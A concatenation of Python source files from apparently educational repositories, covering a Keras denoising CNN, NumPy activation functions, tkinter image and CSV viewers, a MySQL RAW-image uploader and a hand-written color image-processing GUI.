kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer4")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(3, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer5")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
if mode == 'skip' or mode == 'bn':
x = KL.average([x, inputs])
return KM.Model(inputs=inputs, outputs=x,
name='denoising')
@staticmethod
def loss(y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return K.mean(K.square(y_pred - y_true))
@classmethod
def metric(cls, y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return tf.image.psnr(y_true, y_pred, max_val=1.)
@classmethod
def compile(cls, model, optimizer, loss, metric)\
-> None:
model.compile(optimizer=optimizer,
loss=loss,
metrics=[metric])
```
#### File: ImageDenoising/scripts/Model1.py
```python
from typing import Tuple, List
import argparse
import random
from pathlib import Path
from itertools import chain
from functools import reduce
import cv2
import numpy as np
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.utils import Sequence
from tensorflow.keras import optimizers as optim
from tensorflow.keras import backend as K
from tensorflow.keras import models as KM
from tensorflow.keras import layers as KL
def init(seed: int):
random.seed(seed)
np.random.seed(seed)
class Transform:
def __init__(self, *args, **kwargs):
pass
def __call__(self, image: np.ndarray):
pass
class GaussianNoise(Transform):
def __init__(self, size: Tuple[int, int] = None, mean: float = .0, std: float = .1):
super(GaussianNoise, self).__init__()
self.size = size
self.mean = mean
self.std = std
def __call__(self, image: np.ndarray):
super(GaussianNoise, self).__call__(image)
image += np.random.normal(self.mean, self.std, self.size)
return image
class Crop(Transform):
def __init__(self, size: Tuple[int, int] = None, pos: Tuple[int, int] = None):
super(Crop, self).__init__()
self.size = size
self.pos = pos
def __call__(self, image: np.ndarray):
super(Crop, self).__call__(image)
w, h = self.size or (
np.random.randint(int(np.size(image, 0) / 2)),
np.random.randint(int(np.size(image, 1) / 2)),
)
x, y = self.pos or (
np.random.randint(np.size(image, 0) - w),
np.random.randint(np.size(image, 1) - h),
)
return image[x:x + w, y:y + h]
class Resize(Transform):
def __init__(self, size: Tuple[int, int] = (0, 0), scale: float = 1.,
metric=cv2.INTER_CUBIC):
super(Resize, self).__init__()
self.size = size
self.scale = scale
self.metric = metric
def __call__(self, image: np.ndarray):
scale = self.scale
if self.size == (0, 0) and self.scale == 1.:
scale = (np.random.rand(1) * .5 + .5)[0]
return cv2.resize(image, self.size, fx=scale, fy=scale,
interpolation=self.metric)
class Eval:
def __init__(self, filename: str):
self.image = np.expand_dims(cv2.imread(filename) / 255., axis=0)
def set_result(self, image: np.ndarray):
self.image = image
return self
def to_png(self, filename: str):
*path, ext = filename.split('.')
filename = 'Model1.png'
cv2.imwrite(filename, self.image)
class Dataset(keras.utils.Sequence):
def __init__(self, train: bool = True,
source_transforms: List[Transform] = None,
target_transforms: List[Transform] = None,
batch: int = 32, shuffle: bool = True):
self.batch = batch
self.shuffle = shuffle
self.channels = 3
self.is_training = True
(self.x_train, _), (self.x_test, _) = keras.datasets.cifar10.load_data()
self.images = self.x_train
self.size = self.x_train[0].shape[:2]
self.source_transforms = source_transforms or []
self.target_transforms = target_transforms or []
self.indices = np.arange(len(self.x_train))
def train(self, flag: bool = True):
self.is_training = flag
def eval(self):
self.train(False)
def on_epoch_end(self) \
-> None:
if self.shuffle:
np.random.shuffle(self.indices)
def __len__(self) \
-> int:
return len(self.images)
def __getitem__(self, item: int) \
-> Tuple[np.ndarray, np.ndarray]:
sources = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
targets = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
indices = np.roll(self.indices, item)
for b in range(self.batch):
image = self.images[indices[b]]
sources[b] = reduce(lambda i, t: t(i), [image / 255.] + self.source_transforms)
targets[b] = reduce(lambda i, t: t(i), [image / 255.] + self.target_transforms)
return sources, targets
class DenoisingNetwork(object):
def __new__(cls, mode: str) \
-> KM.Model:
assert mode in ['base', 'skip', 'bn']
inputs = KL.Input(shape=[None, None, 3],
name="input_image")
x = inputs
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer1")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer2")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer3")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer4")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(3, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer5")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
if mode == 'skip' or mode == 'bn':
x = KL.average([x, inputs])
return KM.Model(inputs=inputs, outputs=x,
name='denoising')
@staticmethod
def loss(y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return K.mean(K.square(y_pred - y_true))
@classmethod
def metric(cls, y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return tf.image.psnr(y_true, y_pred, max_val=1.)
@classmethod
def compile(cls, model, optimizer, loss, metric)\
-> None:
model.compile(optimizer=optimizer,
loss=loss,
metrics=[metric])
class DenoisingModel(object):
def __init__(self, mode: str):
self.klass = DenoisingNetwork
self.model = self.klass(mode)
def train(self,
train_generator: Sequence,
val_generator: Sequence,
config: object, epochs: int) \
-> None:
optimizer = optim.Adam(lr=config.lr,
decay=config.lr_decay)
self.klass.compile(self.model,
optimizer=optimizer,
loss=self.klass.loss,
metric=self.klass.metric)
self.model.fit_generator(
train_generator,
epochs=epochs,
steps_per_epoch=len(train_generator),
validation_data=val_generator,
validation_steps=100,
workers=4,
use_multiprocessing=True,
callbacks=[
# TensorBoard(log_dir=config.log, write_graph=True, write_images=True),
# CustomCallback(log_dir=config.log, interval=config.interval,
# train=train_generator[0], test=[v for v in val_generator]),
]
)
def predict(self, inputs):
result, *_ = self.model.predict(inputs)
return result
def save(self, path: str):
self.model.save(path)
def main(args: argparse.Namespace):
train_generator = Dataset(
batch=args.batch,
target_transforms=[
], source_transforms=[
GaussianNoise(),
]
)
val_generator = Dataset(
train=False,
batch=1,
target_transforms=[
], source_transforms=[
GaussianNoise(),
]
)
model = DenoisingModel(mode=args.mode)
model.train(train_generator=train_generator,
val_generator=val_generator,
epochs=args.epoch, config=args)
model.save('model.hdf5')
if args.test:
eval_dataset = Eval(args.test)
result = model.predict(eval_dataset.image)
eval_dataset.set_result(result * 255.).to_png(args.test)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate Image Denoising')
parser.add_argument("--mode", default='base', choices=['base', 'skip', 'bn'],
help="Select mode for training model")
parser.add_argument("--epoch", type=int, default=100, required=False,
help="Epoch for training")
parser.add_argument("--interval", type=int, default=1, required=False)
parser.add_argument("--batch", type=int, default=32, required=False,
help="Mini-batch for training")
parser.add_argument("--lr", type=float, default=.001, required=False)
parser.add_argument("--lr-decay", type=float, default=.0, required=False)
parser.add_argument("--test", type=str, default='noisy.png', required=False,
help="Test filename")
parser.add_argument("--log", type=str, default='./logs', required=False,
help="Logging directory")
parser.add_argument("--seed", type=int, default=42, required=False,
help="The answer to life the universe and everything")
arguments = parser.parse_args()
init(arguments.seed)
main(arguments)
```
#### File: ImageDenoising/utils/data.py
```python
from typing import Tuple, List
from pathlib import Path
from itertools import chain
from functools import reduce
import cv2
import numpy as np
import tensorflow.keras as keras
from utils.transform import Transform
class Eval:
def __init__(self, filename: str):
self.image = np.expand_dims(cv2.imread(filename) / 255., axis=0)
def set_result(self, image: np.ndarray):
self.image = image
return self
def to_png(self, filename: str):
*path, ext = filename.split('.')
filename = '.'.join(path) + '-result' + ext
cv2.imwrite(filename, self.image)
class Dataset(keras.utils.Sequence):
def __init__(self, train: bool = True,
source_transforms: List[Transform] = None,
target_transforms: List[Transform] = None,
batch: int = 32, shuffle: bool = True):
self.batch = batch
self.shuffle = shuffle
self.channels = 3
self.is_training = True
(self.x_train, _), (self.x_test, _) = keras.datasets.cifar10.load_data()
self.images = self.x_train
self.size = self.x_train[0].shape[:2]
self.source_transforms = source_transforms or []
self.target_transforms = target_transforms or []
self.indices = np.arange(len(self.x_train))
def train(self, flag: bool = True):
self.is_training = flag
def eval(self):
self.train(False)
def on_epoch_end(self) \
-> None:
if self.shuffle:
np.random.shuffle(self.indices)
def __len__(self) \
-> int:
return len(self.images)
def __getitem__(self, item: int) \
-> Tuple[np.ndarray, np.ndarray]:
sources = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
targets = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
indices = np.roll(self.indices, item)
for b in range(self.batch):
image = self.images[indices[b]]
sources[b] = reduce(lambda i, t: t(i), [image / 255.] + self.source_transforms)
targets[b] = reduce(lambda i, t: t(i), [image / 255.] + self.target_transforms)
return sources, targets
```
#### File: NumpyNeuralNetwork/nnn/activations.py
```python
import numpy as np
from nnn.core import _Module
class Activation(_Module):
pass
class Sigmoid(Activation):
name = 'sigmoid'
def forward(self, X: np.ndarray, grad: bool = True) -> np.ndarray:
super(Sigmoid, self).forward(X, grad)
return 1. / (1. + np.exp(-X))
def backward(self, grad: np.ndarray) -> np.ndarray:
last = super(Sigmoid, self).backward(grad)
result = self.forward(last, grad=False)
return grad * result * (1. - result)
class ReLU(Activation):
name = 'relu'
def forward(self, X: np.ndarray, grad: bool = True) -> np.ndarray:
super(ReLU, self).forward(X, grad)
return np.maximum(0, X)
def backward(self, grad: np.ndarray) -> np.ndarray:
last = super(ReLU, self).backward(grad)
grad = grad.copy()
grad[last <= 0] = 0
return grad
``` |
{
"source": "jiuney/Multicampus_AI",
"score": 3
} |
#### File: 3-ComputerVision/codes/Code05-03 GIF Viewer.py
```python
GIF Viewer.py<gh_stars>10-100
from tkinter import *
from tkinter import messagebox
from tkinter.simpledialog import * # 입력받기. askinteger
from tkinter.filedialog import * # file dialog
import os
## 전역변수 선언부 ##
# dirName = "c:/images/Pet_GIF/Pet_GIF(256x256)/"
fnameList = []
photoList = [None]*6
num = 0 # 현재 사진 순번
## 함수 선언부 ##
def updateView():
global num
global fnameList
photo = PhotoImage(file=fnameList[num])
pLabel.configure(image=photo) # 속성을 바꿔주는 기능
lblFname.configure(text=fnameList[num])
pLabel.photo = photo
def clickPrev():
global num
num -= 1
if num < 0:
num = len(fnameList) - 1
updateView()
def clickLeft(event):
txt = ''
if event.num == 1:
txt += '왼쪽 버튼:'
elif event.num == 2:
txt += '가운데 버튼'
else:
txt += '오른쪽 버튼:'
txt += str(event.x) + ',' + str(event.y)
messagebox.showinfo('요기제목', txt)
def clickNext():
global num
num += 1
if num >= len(fnameList):
num = 0
updateView()
def clickHome():
global num
num = 0
updateView()
def clickEnd():
global num
num = len(fnameList) - 1
updateView()
def keyPress(event):
global num
curKey = event.keycode
curKey = curKey - ord('0')
if num + curKey >= len(fnameList):
num = len(fnameList) - 1
else:
num += curKey
updateView()
def jump(x):
global num
num = (num + x) % len(fnameList)
updateView()
def fileClick():
messagebox.showinfo('요기제목', '요기내용')
def hopImage(count=0):
if count==0:
count = askinteger("건너뛸 수", "숫자-->")
for _ in range(count):
clickNext()
def selectFile():
global pLabel
filename = askopenfilename(parent=window, filetypes=(("GIF파일", "*.gif"),("모든파일", "*.*")))
pLabel.configure(text=str(filename))
pLabel.text=filename
## 메인 코드부 ##
window = Tk()
window.title("GIF 사진 뷰어 (Ver 0.01")
window.geometry("600x400")
window.resizable(width=FALSE, height=TRUE)
folder = askdirectory(parent=window)
for dirName, subDirList, fnames in os.walk(folder):
for fname in fnames:
if os.path.splitext(fname)[1].lower() == '.gif':
fnameList.append(os.path.join(dirName, fname))
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
menuMove = Menu(mainMenu)
menuJump = Menu(mainMenu)
# add cascade - 열리는거
# add command가 있음 - 뭔가 실행되는거
mainMenu.add_cascade(label='이동', menu=menuMove)
menuMove.add_command(label='앞으로', command=clickNext)
menuMove.add_command(label='뒤로', command=clickPrev)
mainMenu.add_cascade(label='건너뛰기', menu=menuJump)
menuJump.add_command(label='1', command=lambda:jump(1))
menuJump.add_command(label='3', command=lambda:jump(3))
menuJump.add_command(label='5', command=lambda:jump(5))
menuJump.add_command(label='원하는거', command=hopImage)
menuJump.add_command(label='파일열기', command=selectFile)
photo = PhotoImage(file= fnameList[num])
pLabel = Label(window, image=photo)
btnHome = Button(window, text='홈', command=clickHome)
btnPrev = Button(window, text='<< 이전 그림', command=clickPrev)
lblFname = Label(window, text=fnameList[num])
btnNext = Button(window, text='다음 그림>>', command=clickNext)
btnEnd = Button(window, text='마지막', command=clickEnd)
btnHome.place(x=50, y=10)
btnPrev.place(x=150, y=10)
lblFname.place(x=250, y=10)
btnNext.place(x=350, y=10)
btnEnd.place(x=450, y=10)
pLabel.place(x=15, y=50)
# label1 = Label(window, image=photo)
# label1.bind("<Button-1>", clickLeft)
window.bind("<Key>", keyPress)
# label1.pack(expand=1, anchor=CENTER)
window.mainloop()
```
#### File: 3-ComputerVision/codes/Code10-03.py
```python
from tkinter import *
from tkinter import ttk
import csv
from tkinter.filedialog import *
def openCSV() :
global csvList
filename = askopenfilename(parent=None,
filetypes=(("CSV 파일", "*.csv"), ("모든 파일", "*.*")))
csvList = []
with open(filename)as rfp:
reader = csv.reader(rfp)
headerList = next(reader)
sum = 0
count = 0
for cList in reader:
csvList.append(cList)
# 기존 시트 클리어
sheet.delete(*sheet.get_children())
# 첫번째 열 헤더 만들기
sheet.column('#0', width=70) # 첫 컬럼의 내부이름
sheet.heading('#0', text=headerList[0])
# 두번째 이후 열 헤더 만들기
sheet['columns'] = headerList[1:] # 두분째 이후 컬럼의 내부이름(내맘대로)
for colName in headerList[1:] :
sheet.column(colName, width=70)
sheet.heading(colName, text=colName)
# 내용 채우기.
for row in csvList :
sheet.insert('', 'end', text=row[0], values=row[1:])
sheet.pack(expand=1, anchor=CENTER)
import xlrd
def openExcel() :
global csvList
filename = askopenfilename(parent=None,
filetypes=(("엑셀 파일", "*.xls;*.xlsx"), ("모든 파일", "*.*")))
csvList = []
workbook = xlrd.open_workbook(filename)
print(workbook.nsheets)
wsList = workbook.sheets()
headerList = []
for i in range(wsList[0].ncols) :
headerList.append(wsList[0].cell_value(0,i))
print(headerList)
# 내용 채우기
for wsheet in wsList :
rowCount = wsheet.nrows
colCount = wsheet.ncols
for i in range(1, rowCount) :
tmpList = []
for k in range(0, colCount) :
tmpList.append(wsheet.cell_value(i,k))
csvList.append(tmpList)
# 기존 시트 클리어
sheet.delete(*sheet.get_children())
# 첫번째 열 헤더 만들기
sheet.column('#0', width=70) # 첫 컬럼의 내부이름
sheet.heading('#0', text=headerList[0])
# 두번째 이후 열 헤더 만들기
sheet['columns'] = headerList[1:] # 두분째 이후 컬럼의 내부이름(내맘대로)
for colName in headerList[1:] :
sheet.column(colName, width=70)
sheet.heading(colName, text=colName)
# 내용 채우기.
for row in csvList :
sheet.insert('', 'end', text=row[0], values=row[1:])
sheet.pack(expand=1, anchor=CENTER)
window = Tk()
window.geometry('600x500')
sheet = ttk.Treeview(window)
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="CSV 처리", menu=fileMenu)
fileMenu.add_command(label="CSV 열기", command=openCSV)
fileMenu.add_command(label="엑셀 열기", command=openExcel)
fileMenu.add_separator()
window.mainloop()
```
#### File: 3-ComputerVision/codes/mission05-02.py
```python
from tkinter import *
from tkinter.filedialog import *
from tkinter.simpledialog import * # for askinteger
## 함수 선언 부분 ##
def func_open():
global photo
filename = askopenfilename(parent = window, filetypes = (("GIF 파일", "*.gif"),
("모든 파일", "*.*")))
photo = PhotoImage(file = filename)
pLabel.configure(image = photo)
pLabel.image = photo
def func_exit():
window.quit()
window.destroy()
def func_zoom_in():
global photo, pLabel
mag = int(askinteger("확대배수", "확대할 배수를 입력하세요(2~8)"))
photo = photo.zoom(mag, mag)
pLabel.configure(image=photo)
pLabel.image = photo
def func_zoom_out():
global photo, pLabel
mag = int(askinteger("축소배수", "축소할 배수를 입력하세요(2~8)"))
photo = photo.subsample(mag, mag)
pLabel.configure(image=photo)
pLabel.image = photo
## 메인 코드 부분 ##
window = Tk()
window.geometry("400x400")
window.title("명화 감상하기")
photo = PhotoImage()
pLabel = Label(window, image = photo)
pLabel.pack(expand = 1, anchor = CENTER)
mainMenu = Menu(window)
window.config(menu = mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label = '파일', menu=fileMenu)
fileMenu.add_command(label = '파일 열기', command = func_open)
fileMenu.add_separator()
fileMenu.add_command(label = '프로그램 종료', command = func_exit)
expandMenu = Menu(mainMenu)
mainMenu.add_cascade(label = '이미지 효과', menu=expandMenu)
expandMenu.add_command(label = '확대하기', command = func_zoom_in)
expandMenu.add_command(label = '축소하기', command = func_zoom_out)
window.mainloop()
```
#### File: 3-ComputerVision/codes/mission08-02.py
```python
from tkinter import *
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
#####################
#### 전역 변수부 ####
#####################
IP_ADDR = '192.168.56.107'
USER_NAME = 'root'
USER_PASS = '<PASSWORD>'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
################
#### 함수부 ####
################
def getPathList(folderFullName: str) -> list:
"""
특정 폴더의 전체 파일을 리스트 형태로 반환합니다.
:param folderFullName:파일명을 가져올 대상 경로. 절대경로
:return: 대상 경로 안에 들어있는 모든 경로들을 절대 경로로 반환(list)
"""
fullNameList = []
for dirName, subDirList, fnames in os.walk(folderFullName):
for fname in fnames:
fullName = os.path.join(dirName, fname)
fullNameList.append(fullName)
return fullNameList
import pymysql
import datetime
def uploadRawImage() -> None:
"""
특정 폴더를 지정해서 일괄적으로 RAW파일을 원격 DB에 저장합니다.
:return:없음
"""
filename = askdirectory(parent=window)
fullNameList = getPathList(filename)
rawFileList = [i for i in fullNameList if os.path.splitext(i)[1].lower() == '.raw']
for rawFile in rawFileList:
con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=<PASSWORD>,
db=DB_NAME, charset=CHAR_SET)
cur = con.cursor()
fullname = rawFile
with open(fullname, 'rb') as rfp:
binData = rfp.read()
fname = os.path.basename(fullname)
fsize = os.path.getsize(fullname)
height = width = int(math.sqrt(fsize))
now = datetime.datetime.now()
upDate = now.strftime('%Y-%m-%d')
upUser = USER_NAME
sql = "INSERT INTO rawImage_TBL(raw_id , raw_height , raw_width"
sql += ", raw_fname , raw_update , raw_uploader, raw_avg , raw_data) "
sql += " VALUES(NULL," + str(height) + "," + str(width) + ",'"
sql += fname + "','" + upDate + "','" + upUser + "',0 , "
sql += " %s )"
tupleData = (binData,)
cur.execute(sql, tupleData)
con.commit()
cur.close()
con.close()
def malloc(h, w, initValue=0) :
retMemory= []
for _ in range(h) :
tmpList = []
for _ in range(w) :
tmpList.append(initValue)
retMemory.append(tmpList)
return retMemory
def getImageDetails(fname) -> tuple:
fsize = os.path.getsize(fname) # 파일의 크기(바이트)
inH = inW = int(math.sqrt(fsize)) # 핵심 코드
## 입력영상 메모리 확보 ##
inImage = []
inImage = malloc(inH, inW)
# 파일 --> 메모리
with open(fname, 'rb') as rFp:
for i in range(inH):
for k in range(inW):
inImage[i][k] = int(ord(rFp.read(1)))
flatData = [inImage[i][k] for i in range(inH) for k in range(inW)]
avgImage = sum(flatData)//(inH*inW)
maxImage = max(flatData)
minImage = min(flatData)
return avgImage, maxImage, minImage
def uploadDetailRawImage():
"""
:param fullNameList:raw파일이 들어있는 경로의 모든 파일
:return:없음
"""
filename = folder = askdirectory(parent=window)
fullNameList = getPathList(filename)
rawFileList = [i for i in fullNameList if os.path.splitext(i)[1].lower() == '.raw']
for rawFile in rawFileList:
con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=<PASSWORD>,
db=DB_NAME, charset=CHAR_SET)
cur = con.cursor()
fullname = rawFile
with open(fullname, 'rb') as rfp:
binData = rfp.read()
fname = os.path.basename(fullname)
fsize = os.path.getsize(fullname)
height = width = int(math.sqrt(fsize))
avgVal, maxVal, minVal = getImageDetails(rawFile)
now = datetime.datetime.now()
upDate = now.strftime('%Y-%m-%d')
upUser = USER_NAME
sql = "INSERT INTO rawImage_TBL2(raw_id , raw_height , raw_width"
sql += ", raw_fname , raw_update , raw_uploader, raw_avg, raw_min, raw_max , raw_data) "
sql += " VALUES(NULL," + str(height) + "," + str(width) + ",'"
sql += fname + "','" + upDate + "','" + upUser + "'," + str(avgVal) + " , "
sql += str(minVal) + ", " + str(maxVal) + ", "
sql += " %s )"
tupleData = (binData,)
cur.execute(sql, tupleData)
con.commit()
cur.close()
con.close()
#####################
#### 메인 코드부 ####
#####################
if __name__ == "__main__":
window = Tk() # 윈도우 생성
window.geometry("500x500") # 가로 500px, 세로 500px
window.title("컴퓨터 비전(딥러닝 기법) ver 0.03")
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="RAW 이미지 일괄 저장(DB)", command=uploadRawImage)
fileMenu.add_command(label="RAW 이미지 일괄 저장(DB) + (평균, 최대값, 최소값)", command=uploadDetailRawImage)
window.mainloop()
```
#### File: 3-ComputerVision/codes/myVision_without_np.py
```python
import tkinter
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
import numpy as np
import struct
import matplotlib.pyplot as plt
import threading
import time
from PIL import Image, ImageFilter, ImageEnhance, ImageOps
import colorsys
import random
import tempfile
import pymysql
import csv
#######################
#### 클래스 선언부 ####
#######################
class Window(tkinter.Tk): # tkinter Tk를 상속
def __init__(self, H=500, W=500):
super(Window, self).__init__()
self.canvas = None
self.inImage = None
self.outImage = None
self.photo = None
self.H = H
self.W = W
self.panYN = N
self.viewX = W
self.viewY = H
self.sx = 0
self.sy = 0
self.ex = W-1
self.ey = H-1
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Canvas(tkinter.Canvas): # tkinter Canvas를 상속
def __init__(self, window, height=500, width=500):
super(Canvas, self).__init__(window, height=height, width=width)
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Paper:
def __init__(self, window: Canvas):
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class __Image:
def __init__(self, H=-1, W=-1):
self.H = H
self.W = W
self.filename = ''
self.mem = None
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
def malloc(self, initValue: int = 0) -> list:
"""
이미지의 높이, 폭 값을 받아온 다음 메모리를 할당하여 list로 돌려준다.
:param initValue:
:return:
"""
if self.H == -1 or self.W == -1:
print("set H and W!! @ %s" % __class__)
exit(-1)
retMemory = []
for RGB in range(3):
retMemory.append([])
for i in range(self.H):
retMemory[RGB].append([])
for k in range(self.W):
retMemory[RGB][i].append(initValue)
self.mem = retMemory
class InImage(__Image):
def __init__(self, H=-1, W=-1):
super(InImage, self).__init__(H=H, W=W)
class OutImage(__Image):
def __init__(self, H=-1, W=-1):
super(OutImage, self).__init__(H=H, W=W)
#########################
#### 전역변수 선언부 ####
#########################
# image information
# mywin = MyWindow(H=500, W=500)
#
# mycan = MyCanvas(parent=mywin)
# mywin.canvas = mycan
#
# mypap = MyPaper(parent=mycan)
# mycan.paper = mypap
#
# inImage = InImage()
# outImage = OutImage()
# DB information
IP_ADDR = '192.168.56.106'
USER_NAME = 'root'
USER_PASS = '<PASSWORD>'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
# tkinter wrapping variables
BOTTOM = tkinter.BOTTOM
X = tkinter.X
SUNKEN = tkinter.SUNKEN
W = tkinter.W
# tkinter wrapping Classes
Label = tkinter.Label
Menu = tkinter.Menu
# color information
R = 0
G = 1
B = 2
#####################
#### 함수 선언부 ####
#####################
def loadImage(window, fname: str) -> None:
photo = Image.open(fname) # PIL 객체
image = InImage()
## 메모리 확보
inW = photo.width
inH = photo.height
image.putSize(H=inH, W=inW)
image.malloc()
photoRGB = photo.convert('RGB')
for i in range(inH):
for k in range(inW):
r, g, b = photoRGB.getpixel((k, i))
image.mem[R][i][k] = r
image.mem[G][i][k] = g
image.mem[B][i][k] = b
window.photo = photo
return image
# 파일을 선택해서 메모리로 로딩하는 함수
def openImageColor(window):
filename = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename:
return
window.inImage = loadImage(window, filename)
equalImage(window)
def saveImageColor(window):
outImage = window.outImage
if not outImage:
return
outArray= []
for i in range(outImage.H):
tmpList = []
for k in range(outImage.W):
tup = tuple([outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k],])
tmpList.append(tup)
outArray.append(tmpList)
outArray = np.array(outArray)
savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension='.', filetypes=(("그림 파일", "*.png;*.jpg;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not saveFp:
return
savePhoto.save(saveFp.name)
print('Save~')
def displayImageColor(window):
canvas = window.canvas
outImage = window.outImage
if canvas: # 예전에 실행한 적이 있다.
canvas.destroy()
window.viewY, window.viewX = outImage.getSize() # H, W값 순서
step = 1
window.geometry(str(int(window.viewX * 1.2)) + 'x' + str(int(window.viewY * 1.2))) # 벽
canvas = Canvas(window, height=window.viewY, width=window.viewX)
window.canvas = canvas
paper = PhotoImage(height=window.viewY, width=window.viewX)
canvas.paper = paper
canvas.create_image(
(window.viewX // 2, window.viewY // 2), image=paper, state='normal')
## 성능 개선
rgbStr = '' # 전체 픽셀의 문자열을 저장
for i in np.arange(0, outImage.H, step):
tmpStr = ''
for k in np.arange(0, outImage.W, step):
i = int(i)
k = int(k)
r, g, b = outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k]
tmpStr += ' #%02x%02x%02x' % (r, g, b)
rgbStr += '{' + tmpStr + '} '
paper.put(rgbStr)
# canvas.bind('<Button-1>', mouseClick)
# canvas.bind('<ButtonRelease-1>', mouseDrop)
canvas.pack(expand=1, anchor=CENTER)
# status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))
# ###############################################
# ##### 컴퓨터 비전(영상처리) 알고리즘 함수 모음 #####
# ###############################################
# # 동일영상 알고리즘
def equalImage(window):
inImage = window.inImage
outImage = window.outImage
###### 메모리 할당 ################
outH, outW = inImage.getSize()
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
def addImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
value = askinteger("밝게/어둡게", "값-->", minvalue=-255, maxvalue=255)
for RGB in range(3) :
for i in range(inImage.H) :
for k in range(inImage.W) :
if inImage.mem[RGB][i][k] + value > 255 :
outImage.mem[RGB][i][k] = 255
elif inImage.mem[RGB][i][k] + value < 0 :
outImage.mem[RGB][i][k] = 0
else :
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k] + value
#############################
window.outImage = outImage
displayImageColor(window)
def revImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = 255 - inImage.mem[RGB][i][k]
#############################
window.outImage = outImage
displayImageColor(window)
def paraImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###\
LUT = [0 for _ in range(256)]
for input in range(256):
LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2))
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = LUT[inImage.mem[RGB][i][k]]
#############################
window.outImage = outImage
displayImageColor(window)
def morphImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 추가 영상 선택
filename2 = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename2:
return
inImage2 = loadImage(window, filename2)
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
# 작은 쪽에 맞춤
if inImage.H > inImage2.H:
inImage.H = inImage2.H
if inImage.W > inImage2.W:
inImage.W = inImage2.W
